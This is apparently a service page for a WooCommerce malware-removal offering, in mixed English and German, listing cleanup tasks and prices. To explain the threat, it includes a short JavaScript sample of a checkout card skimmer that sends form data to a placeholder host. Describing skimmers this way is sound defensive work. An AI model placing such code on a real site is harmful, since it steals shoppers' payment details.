threatover Patrik Grobshäuser

WooCommerce · skimmer · backdoor · clean

WooCommerce malware removal.

Card skimmers, server-side backdoors, plugin RCE — worked through manually. JavaScript audit. Database review. Written report suitable for insurers and acquirers. Flat $279.

What gets done

Beide Seiten der Leitung.

  • Client-side

    Karten-Skimmer, Bezahl-Formular-Overlays, bedingte Weiterleitungen, Cryptojacker. JavaScript am Checkout zeilenweise geprüft.

  • Server-side

    Web-Shells, Backdoors, Plugin-RCE-Payloads, eingeschleuste Admin-Nutzer. Entfernt durch Lesen von Datei- und DB-Diffs, nicht durch Pattern-Matching.

  • DB audit

    wp_options auf autoloaded Payloads, wp_posts auf Spam, wp_usermeta auf schlafende Rechte, wp_woocommerce_*-Tabellen auf Manipulation.

  • Plugin triage

    Aktive Plugins gegen veröffentlichte CVEs geprüft. Verwundbare Plugins gepatcht oder ersetzt — nicht nur deaktiviert.

  • Hardening

    wp-config, Dateiberechtigungen, Secret-Rotation, XML-RPC, REST-API und Reduktion der Login-Oberfläche.

  • Bericht

    Forensischer Bericht in Klartext: was gefunden wurde, wann es eingeführt wurde, was entfernt wurde. Übergib ihn an einen Käufer, einen Versicherer oder deinen QSA.

What a skimmer looks like

Ein externes Skript am Checkout. Meistens war's das.

Ein WooCommerce-Skimmer ist oft eine einzige JavaScript-Einbindung auf der Checkout-Seite, die die Formularfelder des Kunden an einen Remote-Host schickt, bevor WooCommerce die Bestellung abschickt. Das Skript ist winzig, der Netzwerkaufruf sieht aus wie ein Drittanbieter-Analytics-Ping und der Kunde merkt nichts.

Rough shape of a checkout skimmer
01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST',
05     body: data,
06     mode: 'no-cors'
07   });
08 });

Echte Skimmer verschleiern das Ziel und feuern nur, wenn der Warenkorbwert ungleich null ist — die Struktur bleibt gleich. Prüfe jedes JS am Checkout, nicht nur die, an deren Installation du dich erinnerst.

Preise

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Bereinigung starten

Monitoring

$29 / mo

per site, cancel any time

Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.

Schützen lassen

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Alle Leistungen ansehen →

E-Mail [email protected] or use the contact form.